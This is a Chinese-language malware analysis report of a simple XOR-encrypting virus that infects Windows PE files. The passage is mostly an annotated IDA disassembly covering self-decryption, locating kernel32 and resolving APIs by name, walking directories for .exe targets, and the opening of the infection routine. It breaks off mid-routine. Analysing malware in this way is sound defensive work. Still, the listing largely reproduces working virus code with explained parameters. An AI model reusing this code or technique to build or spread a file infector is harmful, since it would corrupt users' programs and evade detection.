有加密的简单病毒
基本信息
报告名称:带加密简单病毒 分析
作者:
报告更新日期: 2012.07.13
样本发现日期:
样本类型:
样本文件大小/被感染文件变化长度: B01h
样本文件MD5 校验值:
样本文件SHA1 校验值:
壳信息:
可能受到威胁的系统:
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
Microsoft Windows vista
Microsoft Windows 7
相关漏洞:
已知检测名称:
简介
针对 PE 文件的病毒
被感染系统及网络症状
程序无法正常启动
文件系统变化
注册表变化
网络症状
详细分析/功能介绍
1 病毒运行后,自身加密,防止查杀,分析。
2 获取相关 API,搜寻感染目标
3 解密病毒自身,加密被感染文件的第一个节,添加节注入病毒
.text:00401000 ;
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.text:00401000 ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
.text:00401000 ; | Licensed to: Mach EDV Dienstleistungen, Jan Mach, 1 user, adv, 11/2007 |
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ;
.text:00401000 ; Input MD5 : E75E98DFB5D445B1D79E52AB522E26A4
.text:00401000
.text:00401000 ; File Name : C:\带简单加密的病毒\jiamivirus.exe
.text:00401000 ; Format : Portable executable for 80386 (PE)
.text:00401000 ; Imagebase : 400000
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size : 00001E2A ( 7722.)
.text:00401000 ; Section size in file : 00002000 ( 8192.)
.text:00401000 ; Offset to raw data for section: 00001000
.text:00401000 ; Flags 60000020: Text Executable Readable
.text:00401000 ; Alignment : default
.text:00401000
.text:00401000 .686p
.text:00401000 .mmx
.text:00401000 .model flat
.text:00401000
.text:00401000 ; ===========================================================================
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Execute
.text:00401000 _text segment para public 'CODE' use32
.text:00401000 assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.text:00401000 db 5 dup(0CCh) ; int3 padding
.text:00401005 ; ---------------------------------------------------------------------------
.text:00401005 ; Three jump thunks sit in front of the real entry point `start` (401030).
.text:00401005 ; The CODE XREFs on inject, sub_40124E and sub_40130A point back here.
.text:00401005 jmp inject ; infect the file named by filename[ebp]
.text:0040100A ; ---------------------------------------------------------------------------
.text:0040100A jmp sub_40124E ; enumerate the current directory and infect matches
.text:0040100F ; ---------------------------------------------------------------------------
.text:0040100F jmp sub_40130A ; walk the subdirectories of the current directory
.text:0040100F ; ---------------------------------------------------------------------------
.text:00401014 db 1Ch dup(0CCh) ; int3 padding up to start (401014 + 1Ch = 401030)
.text:00401030
.text:00401030 ; =============== S U B R O U T I N E =======================================
.text:00401030
.text:00401030
.text:00401030 public start
.text:00401030 start proc near ; DATA XREF: inject+1B9r
.text:00401030
.text:00401030 ; FUNCTION CHUNK AT .text:00401233 SIZE 0000001B BYTES
.text:00401030
.text:00401030 ; Entry point of the viral body. The 32h bytes 401030..401061 are the plaintext
.text:00401030 ; decoder stub that inject copies verbatim (inject+1B9); the 0B01h bytes from
.text:00401030 ; 401062 up to and including dword_401B5F are stored XOR-encoded in an infected
.text:00401030 ; host. Steps: (1) compute the load delta in ebp, (2) XOR-decode the body in
.text:00401030 ; place, (3) XOR-decode the host's first section, (4) locate kernel32 and
.text:00401030 ; resolve the needed exports by name, (5) continue at loc_401233.
.text:00401030 call $+5 ; pushes the address of loc_401035
.text:00401035
.text:00401035 loc_401035: ; DATA XREF: start+6o
.text:00401035 pop ebp
.text:00401036 sub ebp, offset loc_401035 ; ebp = run-time address - link-time address; every xxx[ebp] below is relocated with it
.text:0040103C lea esi, dword_401062[ebp] ; source = encoded body
.text:00401042 lea edi, dword_401062[ebp] ; destination = same bytes (in-place decode)
.text:00401048 mov ecx, 0B01h ; loop count: 0B01h bytes (401062..401B62)
.text:0040104D mov bl, ss:byte_40165F[ebp] ; one-byte XOR key; the slot lies inside the encoded region and is read before decoding
加密病毒本身
.text:00401053
.text:00401053 loc_401053: ; CODE XREF: start+2Ej
.text:00401053 or ecx, ecx ; for (i = 0; i < 0B01h; i++)
.text:00401053 ; {
.text:00401053 ;     body[401062 + i] ^= bl;
.text:00401053 ; }
.text:00401053 ; XOR is symmetric, so the same loop encodes a plaintext body and decodes
.text:00401053 ; an encoded one. inject zeroes byte_40165F before encoding (inject+1D9),
.text:00401053 ; so in an infected copy the slot holds the key itself and decodes to 0;
.text:00401053 ; start+53 writes the key back afterwards.
.text:00401055 jnz short loc_401059
.text:00401057 jmp short loc_401060 ; ecx == 0: body decoded
.text:00401059 ; ---------------------------------------------------------------------------
.text:00401059
.text:00401059 loc_401059: ; CODE XREF: start+25j
.text:00401059 lodsb
.text:0040105A xor al, bl
.text:0040105C stosb
.text:0040105D dec ecx
.text:0040105E jmp short loc_401053 ; loop body, see the pseudo-code at loc_401053
.text:00401060 ; ---------------------------------------------------------------------------
.text:00401060
.text:00401060 loc_401060: ; CODE XREF: start+27j
.text:00401060 jmp short loc_401068 ; skip over the data word below
.text:00401060 ; ---------------------------------------------------------------------------
.text:00401062 dword_401062 dd 72616863h ; DATA XREF: start+Cr
.text:00401062 ; start+12r ...
.text:00401062 ; first bytes of the encoded region (as shown here: "char")
.text:00401066 dw 656Dh
.text:00401068 ; ---------------------------------------------------------------------------
.text:00401068
.text:00401068 loc_401068: ; CODE XREF: start:loc_401060j
.text:00401068 ; Second pass: XOR-decode the host's first section in memory with the same
.text:00401068 ; key. image_base and virtualsize were filled in by inject at infection time
.text:00401068 ; (inject+E2, inject+EB) with the first section's VA and VirtualSize; inject
.text:00401068 ; also set IMAGE_SCN_MEM_WRITE on that section so this write succeeds.
.text:00401068 mov esi, ss:image_base[ebp]
.text:0040106E mov edi, esi
.text:00401070 mov ecx, ss:virtualsize[ebp]
.text:00401076
.text:00401076 loc_401076: ; CODE XREF: start+51j
.text:00401076 or ecx, ecx ; for (i = 0; i < virtualsize; i++) first_section[i] ^= bl;
.text:00401078 jnz short loc_40107C
.text:0040107A jmp short loc_401083
.text:0040107C ; ---------------------------------------------------------------------------
.text:0040107C
.text:0040107C loc_40107C: ; CODE XREF: start+48j
.text:0040107C lodsb
.text:0040107D xor al, bl
.text:0040107F stosb
.text:00401080 dec ecx
.text:00401081 jmp short loc_401076
搜索 kernel,搜索api
.text:00401083 ; ---------------------------------------------------------------------------
.text:00401083
.text:00401083 loc_401083: ; CODE XREF: start+4Aj
.text:00401083 mov ss:byte_40165F[ebp], bl ; store the key back into its slot (the decode pass left it 0)
.text:00401089 mov eax, [esp+0] ; return address that was on the stack at entry
.text:0040108C and eax, 0FFFFF000h ; page-align it
.text:00401091
.text:00401091 loc_401091: ; CODE XREF: start+6Dj
.text:00401091 cmp word ptr [eax], 'ZM' ; walk pages backwards until an MZ header is found
.text:00401096 jz short loc_40109F ; found a module base
.text:00401098 sub eax, 1000h ; previous page; there is no lower bound, an unmapped page would fault here
.text:0040109D jmp short loc_401091
.text:0040109F ; ---------------------------------------------------------------------------
.text:0040109F
.text:0040109F ; NOTE(review): this "method 1" only yields kernel32 if the entry point was
.text:0040109F ; called directly from kernel32; on newer Windows versions the caller is
.text:0040109F ; ntdll, so the export lookups below would search the wrong module — confirm.
.text:0040109F loc_40109F: ; CODE XREF: start+66j
.text:0040109F mov ss:peheader[ebp], eax ; module base found above (analyst's name "peheader")
.text:004010A5 lea esi, byte_40166D[ebp] ; esi = API name string (string not shown in this listing)
.text:004010AB call get_api_process ; eax = module base in, export address out
.text:004010B0 mov ss:dword_401679[ebp], eax ; resolved but not referenced anywhere in this listing
.text:004010B6 mov eax, ss:peheader[ebp]
.text:004010BC lea esi, byte_40171F[ebp]
.text:004010C2 call get_api_process ; look up the export by name
.text:004010C7 mov dword ptr ss:find_firstfile[ebp], eax ; used by sub_40124E and sub_40130A
.text:004010CD mov eax, ss:peheader[ebp]
.text:004010D3 lea esi, byte_4016B4[ebp]
.text:004010D9 call get_api_process ; look up the export by name
.text:004010DE mov ss:setcurrentdirectory[ebp], eax ; used by sub_40130A and loc_401233
.text:004010E4 mov eax, ss:peheader[ebp]
.text:004010EA lea esi, dword_401731[ebp]
.text:004010F0 call get_api_process ; look up the export by name
.text:004010F5 mov ss:getfileatributes[ebp], eax ; used by sub_40124E and sub_40130A
.text:004010FB mov eax, ss:peheader[ebp]
.text:00401101 lea esi, dword_401747[ebp]
.text:00401107 call get_api_process ; look up the export by name
.text:0040110C mov ss:find_nexttfile[ebp], eax ; used by sub_40124E and sub_40130A
.text:00401112 mov eax, ss:peheader[ebp]
.text:00401118 lea esi, dword_401758[ebp]
.text:0040111E call get_api_process ; look up the export by name
.text:00401123 mov ss:dword_401762[ebp], eax ; resolved but not referenced anywhere in this listing
.text:00401129 mov eax, ss:peheader[ebp]
.text:0040112F lea esi, dword_40167D[ebp]
.text:00401135 call get_api_process ; look up the export by name
.text:0040113A mov ss:dword_401688[ebp], eax ; called by inject with a CreateFile-style argument list (name string not shown)
.text:00401140 mov eax, ss:peheader[ebp]
.text:00401146 lea esi, dword_401766[ebp]
.text:0040114C call get_api_process ; look up the export by name
.text:00401151 mov ss:dword_40176E[ebp], eax ; resolved but not referenced anywhere in this listing
.text:00401157 mov eax, ss:peheader[ebp]
.text:0040115D lea esi, dword_40170F[ebp]
.text:00401163 call get_api_process ; look up the export by name
.text:00401168 mov ss:getfilesize[ebp], eax ; used by inject
.text:0040116E mov eax, ss:peheader[ebp]
.text:00401174 lea esi, aCreatefilemapp[ebp] ; "CreateFileMapping"
.text:00401174 ; no A/W suffix: relies on the prefix match in get_api_process
.text:0040117A call get_api_process ; look up the export by name
.text:0040117F mov ss:creatfile_map[ebp], eax ; used by inject
.text:00401185 mov eax, ss:peheader[ebp]
.text:0040118B lea esi, dword_4016A2[ebp]
.text:00401191 call get_api_process ; look up the export by name
.text:00401196 mov ss:viewoffile[ebp], eax ; used by inject with MapViewOfFile-style arguments
.text:0040119C mov eax, ss:peheader[ebp]
.text:004011A2 lea esi, dword_4016CC[ebp]
.text:004011A8 call get_api_process ; look up the export by name
.text:004011AD mov ss:dword_4016D8[ebp], eax ; resolved but not referenced anywhere in this listing
.text:004011B3 mov eax, ss:peheader[ebp]
.text:004011B9 lea esi, dword_4016EB[ebp]
.text:004011BF call get_api_process ; look up the export by name
.text:004011C4 mov ss:dword_4016FB[ebp], eax ; called by inject with map_base (consistent with UnmapViewOfFile; name string not shown)
.text:004011CA mov eax, ss:peheader[ebp]
.text:004011D0 lea esi, dword_4016FF[ebp]
.text:004011D6 call get_api_process ; look up the export by name
.text:004011DB mov ss:dword_40170B[ebp], eax ; called twice at the end of inject with the mapping and file handles (consistent with CloseHandle; name string not shown)
.text:004011E1 jmp short loc_401233 ; continue in the function chunk: cd and start walking
.text:004011E1 start endp
.text:004011E1
.text:004011E3
.text:004011E3 ; =============== S U B R O U T I N E =======================================
.text:004011E3
在导出表中搜索需要的api
.text:004011E3 ;
.text:004011E3
.text:004011E3 get_api_process proc near ; CODE XREF: start+7Bp
.text:004011E3 ; start+92p ...
.text:004011E3 ; Resolve an export by name from a module's export directory.
.text:004011E3 ;   in:  eax = module base, esi = NUL-terminated name to find
.text:004011E3 ;   out: eax = absolute address of the export; esi restored, ebx/ecx/edx/edi clobbered
.text:004011E3 ; The compare stops when the search string ends (get_api_process+2B) without
.text:004011E3 ; checking that the export name ends too, so a name matches any export it is
.text:004011E3 ; a prefix of ("CreateFileMapping" resolves to the first export starting with
.text:004011E3 ; it). NumberOfNames is never consulted, so an unknown name walks past the
.text:004011E3 ; end of the name table; forwarded exports are not handled.
.text:004011E3 mov ebx, [eax+3Ch] ; e_lfanew
.text:004011E6 add ebx, eax ; IMAGE_NT_HEADERS
.text:004011E8 add ebx, 78h ; +78h = DataDirectory[0] (export table entry)
.text:004011EB mov ebx, [ebx] ; RVA of IMAGE_EXPORT_DIRECTORY
.text:004011ED add ebx, eax ; ebx = export directory (VA)
.text:004011EF xor edx, edx ; edx = 1-based index of the name being compared
.text:004011F1 mov ecx, [ebx+20h] ; AddressOfNames
.text:004011F4 add ecx, eax ; ecx = &nameRva[0]
.text:004011F6 push esi
.text:004011F7 push edx
.text:004011F8
.text:004011F8 loc_4011F8: ; CODE XREF: get_api_process+27j
.text:004011F8 pop edx ; restore index and search string (both are clobbered by the compare)
.text:004011F9 pop esi
.text:004011FA inc edx
.text:004011FB mov edi, [ecx] ; RVA of the current export name
.text:004011FD add edi, eax ; edi = export name string
.text:004011FF add ecx, 4 ; advance to the next name RVA
.text:00401202 push esi
.text:00401203 push edx
.text:00401204
.text:00401204 loc_401204: ; CODE XREF: get_api_process+30j
.text:00401204 mov dl, [edi]
.text:00401206 mov dh, [esi]
.text:00401208 cmp dl, dh
.text:0040120A jnz short loc_4011F8 ; mismatch: try the next export name
.text:0040120C inc edi
.text:0040120D inc esi
.text:0040120E cmp byte ptr [esi], 0 ; only the search string's terminator is tested (prefix match)
.text:00401211 jz short loc_401215
.text:00401213 jmp short loc_401204
.text:00401215 ; ---------------------------------------------------------------------------
.text:00401215
.text:00401215 loc_401215: ; CODE XREF: get_api_process+2Ej
.text:00401215 pop edx
.text:00401216 pop esi ; esi = search string again
.text:00401217 dec edx ; 0-based name index
.text:00401218 shl edx, 1 ; * sizeof(WORD)
.text:0040121A mov ecx, [ebx+24h] ; AddressOfNameOrdinals
.text:0040121D add ecx, eax
.text:0040121F add ecx, edx
.text:00401221 xor edx, edx
.text:00401223 mov dx, [ecx] ; index into AddressOfFunctions
.text:00401226 shl edx, 2 ; * sizeof(DWORD)
.text:00401229 mov ecx, [ebx+1Ch] ; AddressOfFunctions
.text:0040122C add ecx, eax
.text:0040122E add ecx, edx
.text:00401230 add eax, [ecx] ; base + function RVA
.text:00401232 retn
.text:00401232 get_api_process endp
.text:00401232
.text:00401233 ; ---------------------------------------------------------------------------
.text:00401233 ; START OF FUNCTION CHUNK FOR start
转换当前位置寻找感染目标
.text:00401233
.text:00401233 loc_401233: ; CODE XREF: start+1B1j
.text:00401233 ; Tail of start: change into directroy_path (string not shown), walk it with
.text:00401233 ; sub_40130A, then leave through nullsub_1 (not in this listing).
.text:00401233 lea esi, directroy_path[ebp]
.text:00401239 push esi
.text:0040123A mov eax, ss:setcurrentdirectory[ebp]
.text:00401240 call eax ; SetCurrentDirectory(directroy_path)
.text:00401242 push ebp ; keep the load delta across the walk
.text:00401243 call sub_40130A ; walk subdirectories and infect their files
.text:00401248 pop ebp
.text:00401249 jmp nullsub_1 ; not in this listing; presumably hands control on to the host
.text:00401249 ; END OF FUNCTION CHUNK FOR start
.text:0040124E
.text:0040124E ; =============== S U B R O U T I N E =======================================
.text:0040124E
.text:0040124E
.text:0040124E sub_40124E proc near ; CODE XREF: .text:0040100Aj
.text:0040124E ; sub_40130A+66p ...
.text:0040124E ; Enumerate the current directory with the pattern at byte_401893 (string not
.text:0040124E ; shown) and call inject on every match whose name does not start with '.'
.text:0040124E ; and whose attributes are not exactly FILE_ATTRIBUTE_DIRECTORY.
.text:0040124E ; Returns -1 when FindFirstFile fails, otherwise whatever FindNextFile left
.text:0040124E ; in eax. The search handle (dword_4018A4) is never closed in this listing.
.text:0040124E lea eax, dword_401A12[ebp] ; WIN32_FIND_DATA buffer
.text:00401254 push eax
.text:00401255 lea eax, byte_401893[ebp] ; search pattern
.text:0040125B push eax
.text:0040125C mov eax, dword ptr ss:find_firstfile[ebp]
.text:00401262 call eax ; FindFirstFile(pattern, &data)
.text:00401264 mov ss:dword_4018A4[ebp], eax ; search handle
.text:0040126A cmp eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE?
.text:0040126D jnz short loc_401279
.text:0040126F mov eax, 0FFFFFFFFh
.text:00401274 jmp locret_401309
.text:00401279 ; ---------------------------------------------------------------------------
.text:00401279
.text:00401279 loc_401279: ; CODE XREF: sub_40124E+1Fj
.text:00401279 lea esi, dword_401A12[ebp]
.text:0040127F lea eax, [esi+2Ch] ; +2Ch = cFileName
.text:00401282 mov esi, eax
.text:00401284 lodsb
.text:00401285 cmp al, '.' ; skip "." and ".." (and any other name starting with '.')
.text:00401287 jnz short loc_40128B
.text:00401289 jmp short loc_4012B2
.text:0040128B ; ---------------------------------------------------------------------------
.text:0040128B
.text:0040128B loc_40128B: ; CODE XREF: sub_40124E+39j
.text:0040128B lea esi, dword_401A12[ebp]
.text:00401291 lea eax, [esi+2Ch]
.text:00401294 push eax ; copy kept as the filename pointer for after the call
.text:00401295 push eax ; argument (popped by the callee)
.text:00401296 mov eax, ss:getfileatributes[ebp]
.text:0040129C call eax ; GetFileAttributes(name)
.text:0040129E cmp eax, 10h ; exact compare with FILE_ATTRIBUTE_DIRECTORY: a directory that also
.text:0040129E ; has other bits set (hidden, read-only, ...) is not recognised and is handed to inject
.text:004012A1 jz short loc_4012B1
.text:004012A3 pop eax ; filename pointer
.text:004012A4 mov ss:filename[ebp], eax
.text:004012AA call inject ; infect this file
.text:004012AF jmp short loc_4012B2
.text:004012B1 ; ---------------------------------------------------------------------------
.text:004012B1
.text:004012B1 loc_4012B1: ; CODE XREF: sub_40124E+53j
.text:004012B1 pop eax ; discard the kept copy
.text:004012B2
.text:004012B2 loc_4012B2: ; CODE XREF: sub_40124E+3Bj
.text:004012B2 ; sub_40124E+61j ...
.text:004012B2 ; Main loop: next directory entry, same '.' and attribute filters as above.
.text:004012B2 lea esi, dword_401A12[ebp]
.text:004012B8 push esi
.text:004012B9 mov esi, ss:dword_4018A4[ebp]
.text:004012BF push esi
.text:004012C0 mov eax, ss:find_nexttfile[ebp]
.text:004012C6 call eax ; FindNextFile(handle, &data)
.text:004012C8 or eax, eax ; 0 = no more entries
.text:004012CA jnz short loc_4012CE
.text:004012CC jmp short locret_401309
.text:004012CE ; ---------------------------------------------------------------------------
.text:004012CE
.text:004012CE loc_4012CE: ; CODE XREF: sub_40124E+7Cj
.text:004012CE lea esi, dword_401A12[ebp]
.text:004012D4 lea eax, [esi+2Ch] ; cFileName
.text:004012D7 mov esi, eax
.text:004012D9 lodsb
.text:004012DA cmp al, 2Eh ; '.'
.text:004012DC jnz short loc_4012E0
.text:004012DE jmp short loc_4012B2
.text:004012E0 ; ---------------------------------------------------------------------------
.text:004012E0
.text:004012E0 loc_4012E0: ; CODE XREF: sub_40124E+8Ej
.text:004012E0 lea esi, dword_401A12[ebp]
.text:004012E6 lea eax, [esi+2Ch]
.text:004012E9 push eax ; kept copy
.text:004012EA push eax ; argument
.text:004012EB mov eax, ss:getfileatributes[ebp]
.text:004012F1 call eax ; GetFileAttributes(name)
.text:004012F3 cmp eax, 10h ; exactly FILE_ATTRIBUTE_DIRECTORY? (same caveat as above)
.text:004012F6 jz short loc_401306
.text:004012F8 pop eax
.text:004012F9 mov ss:filename[ebp], eax
.text:004012FF call inject ; candidate is a plain file: infect it
.text:00401304 jmp short loc_401307
.text:00401306 ; ---------------------------------------------------------------------------
.text:00401306
.text:00401306 loc_401306: ; CODE XREF: sub_40124E+A8j
.text:00401306 pop eax ; discard the kept copy
.text:00401307
.text:00401307 loc_401307: ; CODE XREF: sub_40124E+B6j
.text:00401307 jmp short loc_4012B2
.text:00401309 ; ---------------------------------------------------------------------------
.text:00401309
.text:00401309 locret_401309: ; CODE XREF: sub_40124E+26j
.text:00401309 ; sub_40124E+7Ej
.text:00401309 retn
.text:00401309 sub_40124E endp
.text:00401309
.text:0040130A
.text:0040130A ; =============== S U B R O U T I N E =======================================
.text:0040130A
.text:0040130A
.text:0040130A sub_40130A proc near ; CODE XREF: .text:0040100Fj
.text:0040130A ; start+213p
.text:0040130A ; Enumerate the current directory with the pattern at word_40188F and, for
.text:0040130A ; every entry reported as exactly FILE_ATTRIBUTE_DIRECTORY, cd into it, run
.text:0040130A ; sub_40124E there, and cd back via dword_401899. Plain files at this level
.text:0040130A ; are skipped (sub_40130A+52 / +BD jump straight to the next entry), so all
.text:0040130A ; infection happens one directory level down. Returns -1 if FindFirstFile
.text:0040130A ; fails. The search handle (file_handle) is never closed in this listing.
.text:0040130A lea esi, file_data_stru[ebp] ; WIN32_FIND_DATA buffer
.text:00401310 push esi
.text:00401311 lea esi, word_40188F[ebp] ; search pattern; the analyst notes it selects .exe files (string not shown)
.text:00401317 push esi
.text:00401318 mov eax, dword ptr ss:find_firstfile[ebp]
.text:0040131E call eax ; FindFirstFile(pattern, &data)
.text:00401320 mov ss:file_handle[ebp], eax ; search handle
.text:00401326 cmp eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE?
.text:00401329 jnz short loc_401335
.text:0040132B mov eax, 0FFFFFFFFh
.text:00401330 jmp locret_4013F1
.text:00401335 ; ---------------------------------------------------------------------------
.text:00401335
.text:00401335 loc_401335: ; CODE XREF: sub_40130A+1Fj
.text:00401335 lea esi, file_data_stru[ebp]
.text:0040133B lea eax, [esi+2Ch] ; +2Ch = cFileName
.text:0040133E mov esi, eax
.text:00401340 lodsb
.text:00401341 cmp al, '.' ; skip "." and ".."
.text:00401343 jnz short loc_401347
.text:00401345 jmp short loc_401384
.text:00401347 ; ---------------------------------------------------------------------------
.text:00401347
.text:00401347 loc_401347: ; CODE XREF: sub_40130A+39j
.text:00401347 lea esi, file_data_stru[ebp]
.text:0040134D lea eax, [esi+2Ch]
.text:00401350 push eax
.text:00401351 mov eax, ss:getfileatributes[ebp] ; returns the attributes of the named file or directory
.text:00401357 call eax
.text:00401359 cmp eax, 10h ; exactly FILE_ATTRIBUTE_DIRECTORY? (a directory with extra bits set is skipped)
.text:0040135C jnz short loc_401384 ; not a directory: skip it
.text:0040135E lea esi, file_data_stru[ebp] ; it is a directory
.text:00401364 lea eax, [esi+2Ch]
.text:00401367 push eax
.text:00401368 mov eax, ss:setcurrentdirectory[ebp]
.text:0040136E call eax ; SetCurrentDirectory(name)
.text:00401370 call sub_40124E ; infect the files inside; its return value is ignored
.text:00401375 lea eax, dword_401899[ebp] ; likely ".." given the +3 slot reuse in inject; string not shown
.text:0040137B push eax
.text:0040137C mov eax, ss:setcurrentdirectory[ebp]
.text:00401382 call eax ; back to the parent directory
.text:00401384
.text:00401384 loc_401384: ; CODE XREF: sub_40130A+3Bj
.text:00401384 ; sub_40130A+52j ...
.text:00401384 ; Main loop: next entry, same filters as above.
.text:00401384 lea esi, file_data_stru[ebp]
.text:0040138A push esi
.text:0040138B mov eax, ss:file_handle[ebp]
.text:00401391 push eax
.text:00401392 mov eax, ss:find_nexttfile[ebp]
.text:00401398 call eax ; FindNextFile(handle, &data)
.text:0040139A or eax, eax ; 0 = no more entries
.text:0040139C jnz short loc_4013A0
.text:0040139E jmp short locret_4013F1
.text:004013A0 ; ---------------------------------------------------------------------------
.text:004013A0
.text:004013A0 loc_4013A0: ; CODE XREF: sub_40130A+92j
.text:004013A0 lea esi, file_data_stru[ebp]
.text:004013A6 lea eax, [esi+2Ch] ; cFileName
.text:004013A9 mov esi, eax
.text:004013AB lodsb
.text:004013AC cmp al, '.'
.text:004013AE jnz short loc_4013B2
.text:004013B0 jmp short loc_401384
.text:004013B2 ; ---------------------------------------------------------------------------
.text:004013B2
.text:004013B2 loc_4013B2: ; CODE XREF: sub_40130A+A4j
.text:004013B2 lea esi, file_data_stru[ebp]
.text:004013B8 lea eax, [esi+2Ch]
.text:004013BB push eax
.text:004013BC mov eax, ss:getfileatributes[ebp]
.text:004013C2 call eax ; GetFileAttributes(name)
.text:004013C4 cmp eax, 10h ; exactly FILE_ATTRIBUTE_DIRECTORY?
.text:004013C7 jnz short loc_4013EF ; not a directory: skip it
.text:004013C9 lea esi, file_data_stru[ebp]
.text:004013CF lea eax, [esi+2Ch]
.text:004013D2 push eax
.text:004013D3 mov eax, ss:setcurrentdirectory[ebp]
.text:004013D9 call eax ; SetCurrentDirectory(name)
.text:004013DB call sub_40124E ; infect the files inside
.text:004013E0 lea eax, dword_401899[ebp]
.text:004013E6 push eax
.text:004013E7 mov eax, ss:setcurrentdirectory[ebp]
.text:004013ED call eax ; back to the parent directory
.text:004013EF
.text:004013EF loc_4013EF: ; CODE XREF: sub_40130A+BDj
.text:004013EF jmp short loc_401384
.text:004013F1 ; ---------------------------------------------------------------------------
.text:004013F1
.text:004013F1 locret_4013F1: ; CODE XREF: sub_40130A+26j
.text:004013F1 ; sub_40130A+94j
.text:004013F1 retn
.text:004013F1 sub_40130A endp
.text:004013F1
.text:004013F2
.text:004013F2 ; =============== S U B R O U T I N E =======================================
.text:004013F2
感染主体
.text:004013F2
.text:004013F2 inject proc near ; CODE XREF: .text:00401005j
.text:004013F2 ; sub_40124E+5Cp ...
.text:004013F2 ; Infect the file named by filename[ebp]:
.text:004013F2 ;   1. open it and map it with 0B33h + 1000h bytes of extra room;
.text:004013F2 ;   2. read NumberOfSections, ImageBase, AddressOfEntryPoint, FileAlignment;
.text:004013F2 ;   3. mark the first section writable/executable and remember its VA, size
.text:004013F2 ;      and raw pointer; find the section stored last in the file;
.text:004013F2 ;   4. rename that last section ".text", grow it by 0B3Ah (32h stub + 0B01h
.text:004013F2 ;      encoded body + 7-byte trampoline) and re-align SizeOfRawData;
.text:004013F2 ;   5. write the stub, the XOR-encoded body and a "mov eax, entry; call eax"
.text:004013F2 ;      trampoline, XOR-encode the host's first section with the same key;
.text:004013F2 ;   6. point AddressOfEntryPoint at the stub, bump SizeOfImage, unmap, close.
.text:004013F2 ; No MZ/PE signature check, no "already infected" marker check and no check
.text:004013F2 ; on any handle or pointer returned by the APIs is visible, so a host is
.text:004013F2 ; re-infected on every pass and a failed open is not noticed.
.text:004013F2 push 0 ; hTemplateFile
.text:004013F4 push 80h ; FILE_ATTRIBUTE_NORMAL
.text:004013F9 push 4 ; OPEN_ALWAYS
.text:004013FB push 0 ; lpSecurityAttributes
.text:004013FD push 3 ; FILE_SHARE_READ | FILE_SHARE_WRITE
.text:004013FF push 0C0000000h ; GENERIC_READ | GENERIC_WRITE
.text:00401404 mov eax, ss:filename[ebp]
.text:0040140A push eax ; lpFileName
.text:0040140B mov eax, ss:dword_401688[ebp]
.text:00401411 call eax ; argument list matches CreateFile(filename, ...); result not checked
.text:00401413 mov ss:(dword_401899+3)[ebp], eax ; file handle, stored in the bytes following dword_401899
.text:00401419 push 0 ; lpFileSizeHigh
.text:0040141B push eax ; hFile
.text:0040141C mov eax, ss:getfilesize[ebp]
.text:00401422 call eax ; GetFileSize(hFile, NULL)
.text:00401424 add eax, 0B33h ; + 32h stub + 0B01h body
.text:00401429 add eax, 1000h ; + one extra page of slack
.text:0040142E mov ss:dword_401B5F[ebp], eax ; mapping size (this slot is the last dword of the encoded region)
.text:00401434 push 0 ; lpName
.text:00401436 mov eax, ss:dword_401B5F[ebp]
.text:0040143C push eax ; dwMaximumSizeLow
.text:0040143D push 0 ; dwMaximumSizeHigh
.text:0040143F push 4 ; PAGE_READWRITE
.text:00401441 push 0 ; lpAttributes
.text:00401443 mov eax, ss:(dword_401899+3)[ebp]
.text:00401449 push eax ; hFile
.text:0040144A mov eax, ss:creatfile_map[ebp]
.text:00401450 call eax ; CreateFileMapping(hFile, 0, PAGE_READWRITE, 0, size, 0)
.text:00401450 ; NOTE(review): a maximum size larger than the file extends it on disk, so the
.text:00401450 ; host should grow by at least 0B33h + 1000h bytes — confirm on a sample.
.text:00401452 mov ss:dword_4018A8[ebp], eax ; file mapping handle; not checked
.text:00401458 push ss:dword_401B5F[ebp] ; dwNumberOfBytesToMap
.text:0040145E push 0 ; dwFileOffsetLow
.text:00401460 push 0 ; dwFileOffsetHigh
.text:00401462 push 2 ; FILE_MAP_WRITE
.text:00401464 mov eax, ss:dword_4018A8[ebp]
.text:0040146A push eax ; hFileMappingObject
.text:0040146B mov eax, ss:viewoffile[ebp]
.text:00401471 call eax ; MapViewOfFile(hMap, FILE_MAP_WRITE, 0, 0, size)
.text:00401473 mov ss:map_base[ebp], eax ; view base; not checked for NULL
.text:00401479 mov edi, eax
.text:0040147B xor eax, eax
.text:0040147D mov ax, [edi] ; reads e_magic but never compares it
.text:00401480 add edi, [edi+3Ch] ; e_lfanew
.text:00401483 add edi, 4 ; skip "PE\0\0": edi = IMAGE_FILE_HEADER
.text:00401486 xor ecx, ecx
.text:00401488 mov cx, [edi+2] ; NumberOfSections
.text:0040148C mov ss:num_of_section[ebp], ecx
.text:00401492 add edi, 14h ; edi = IMAGE_OPTIONAL_HEADER
.text:00401495 mov ss:option_header[ebp], edi
.text:0040149B mov eax, [edi+1Ch] ; ImageBase
.text:0040149E mov ss:image_base[ebp], eax
.text:004014A4 add eax, [edi+10h] ; + AddressOfEntryPoint
.text:004014A7 mov ss:entry_add[ebp], eax ; absolute VA of the original entry point
.text:004014AD mov eax, [edi+24h] ; FileAlignment
.text:004014B0 mov ss:filealign[ebp], eax
.text:004014B6 add edi, 0E0h ; first section header; assumes SizeOfOptionalHeader == 0E0h instead of reading it
.text:004014BC xor esi, esi ; esi = highest PointerToRawData seen so far
.text:004014BE
.text:004014BE loc_4014BE: ; CODE XREF: inject+112j
.text:004014BE ; Section loop: ecx counts down NumberOfSections, edi walks the headers.
.text:004014BE or ecx, ecx
.text:004014C0 jnz short loc_4014C4 ; more sections to look at
.text:004014C2 jmp short loc_401506 ; done: eax holds the header of the last section in the file
.text:004014C4 ; ---------------------------------------------------------------------------
.text:004014C4
.text:004014C4 loc_4014C4: ; CODE XREF: inject+CEj
.text:004014C4 or esi, esi ; esi is still 0 for the first section (and stays 0 if its PointerToRawData is 0)
.text:004014C6 jnz short loc_4014F6
.text:004014C8 mov eax, [edi+14h] ; first section: PointerToRawData
.text:004014CB mov ss:point_to_rawdata[ebp], eax
